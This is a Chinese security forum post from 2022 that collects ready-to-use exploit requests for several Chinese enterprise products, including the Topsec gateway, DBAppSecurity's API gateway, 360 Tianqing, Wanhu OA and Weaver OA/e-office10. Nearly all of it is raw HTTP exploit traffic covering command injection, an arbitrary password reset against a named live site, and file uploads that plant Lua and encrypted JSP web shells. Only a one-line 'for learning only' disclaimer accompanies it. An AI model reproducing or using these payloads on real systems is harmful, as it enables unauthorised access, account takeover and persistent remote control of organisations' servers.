DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 25477|回复: 1

[2022] 情报共享 (0728)

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-7-28 11:49:37 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

天融信 - 上网行为管理系统


一句话

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
  2. echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
复制代码

Base64 版

  1. /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
  2. echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-
  3. d%20%3E%3E%20/var/www/html/1.php%0a
复制代码

安恒数据大脑 API 网关任意密码重置漏洞


安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞,这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例:

在前端代码中包含重置密码的连接以及密码加密方式

按照前端代码说明,构造重置密码数据包

  1. //此处重置的密码为:p@ssw0rd
  2. POST /q/common-permission/public/users/forgetPassword HTTP/1.1
  3. Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
  5. Accept-Language: en-US,en;q=0.5
  6. Content-type: application/json
  7. Accept-Encoding: gzip, deflate
  8. Connection: close
  9. Upgrade-Insecure-Requests: 1
  10. Content-Length: 104

  11. {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
  12. rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
复制代码

360 天擎任意文件上传


/api/client_upload_file.json

  1. POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
  2. 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
  3. Host: 192.168.11.210
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
  5. (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  6. Content-Length: 323
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
  8. Q
  9. Referer: http://192.168.11.210
  10. Accept-Encoding: gzip
  11. ------WebKitFormBoundaryLx7ATxHThfk91oxQ
  12. Content-Disposition: form-data; name="file"; filename="flash.php"
  13. Content-Type: application/xxxx
  14. if ngx.req.get_uri_args().cmd then
  15. cmd = ngx.req.get_uri_args().cmd
  16. local t = io.popen(cmd)
  17. local a = t:read("*all")
  18. ngx.say(a)
  19. end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
复制代码

万户 OA 文件上传


/defaultroot/officeserverservlet

  1. POST /defaultroot/officeserverservlet HTTP/1.1
  2. Host: XXXXXXXXX:7001
  3. Content-Length: 782
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://XXXXXXXX7001
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li
  8. ke Gecko) Chrome/89.0.4389.114 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
  10. e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  11. Accept-Language: zh-CN,zh;q=0.9
  12. Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN
  13. Connection: close
  14. DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE
  15. VQ
  16. OPTION=U0FWRUZJTEU=
  17. RECORDID=
  18. isDoc=dHJ1ZQ==
  19. moduleType=Z292ZG9jdW1lbnQ=
  20. FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==
  21. 111111111111111111111111111111111111111
  22. <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class
  23. Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le
  24. ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man
  25. ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec
  26. (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6
  27. 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex
  28. t);}%>
复制代码

DBSTEP V3.0 170 0 1000

170 是控制从报文中什么地方读取

1000 是控制 webshell 源代码内容大小

泛微 OA 文件上传


/workrelate/plan/util/uploaderOperate.jsp

  1. POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
  2. Host: X.X.X.X
  3. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
  4. Sec-Ch-Ua-Mobile: ?0
  5. Sec-Ch-Ua-Platform: "macOS"
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  8. Gecko) Chrome/101.0.4951.64 Safari/537.36
  9. Accept:
  10. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  11. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-Mode: navigate
  14. Sec-Fetch-User: ?1
  15. Sec-Fetch-Dest: document
  16. Accept-Encoding: gzip, deflate
  17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  18. Connection: close
  19. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
  20. Content-Length: 393
  21. ------WebKitFormBoundarymVk33liI64J7GQaK
  22. Content-Disposition: form-data; name="secId"
  23. 1
  24. ------WebKitFormBoundarymVk33liI64J7GQaK
  25. Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
  26. Test
  27. ------WebKitFormBoundarymVk33liI64J7GQaK
  28. Content-Disposition: form-data; name="plandetailid"
  29. 1
  30. ------WebKitFormBoundarymVk33liI64J7GQaK—
复制代码

将文件释放至跟网站根路径下 在数据包中将 fileid 替换

  1. POST /OfficeServer HTTP/1.1
  2. Host: X.X.X.X
  3. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
  4. Sec-Ch-Ua-Mobile: ?0
  5. Sec-Ch-Ua-Platform: "macOS"
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  8. Gecko) Chrome/101.0.4951.64 Safari/537.36
  9. Accept:
  10. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  11. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-Mode: navigate
  14. Sec-Fetch-User: ?1
  15. Sec-Fetch-Dest: document
  16. Accept-Encoding: gzip, deflate
  17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  18. Connection: close
  19. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
  20. Content-Length: 207
  21. ------WebKitFormBoundarymVk33liI64J7GQaK
  22. Content-Disposition: form-data; name="aaa"
  23. {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
  24. ------WebKitFormBoundarymVk33liI64J7GQaK—
复制代码

泛微 eoffice10 前台 getshell


eoffice10/version.json

版本号:http://XXXXXXX:8010/eoffice10/version.json

  1. <form method='post'
  2. action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
  3. enctype="multipart/form-data" >
  4. <input type="file" name="FileData"/></br></br>
  5. <input type="text" name="FormData" value="1"/></br></br>
  6. <button type=submit value="上传">上传</button> </form>
复制代码

shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

  1. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
  2. Host: XXXXXXXX:8010
  3. Content-Length: 378
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: null
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
  9. Gecko) Chrome/91.0.4472.77 Safari/537.36
  10. Accept:
  11. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  12. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
  15. Connection: close
  16. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  17. Content-Disposition: form-data; name="FileData"; filename="1.jpg"
  18. Content-Type: image/jpeg
  19. <?php echo md5(1);?>
  20. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  21. Content-Disposition: form-data; name="FormData"
  22. {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
  23. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
复制代码

0

主题

2

回帖

0

荣誉

Rank: 1

UID
746
积分
2
精华
0
沃币
0 枚
注册时间
2022-7-28
发表于 2022-7-28 13:20:32 | 显示全部楼层
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1楼
2楼

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 16:13 , Processed in 0.062270 second(s), 24 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表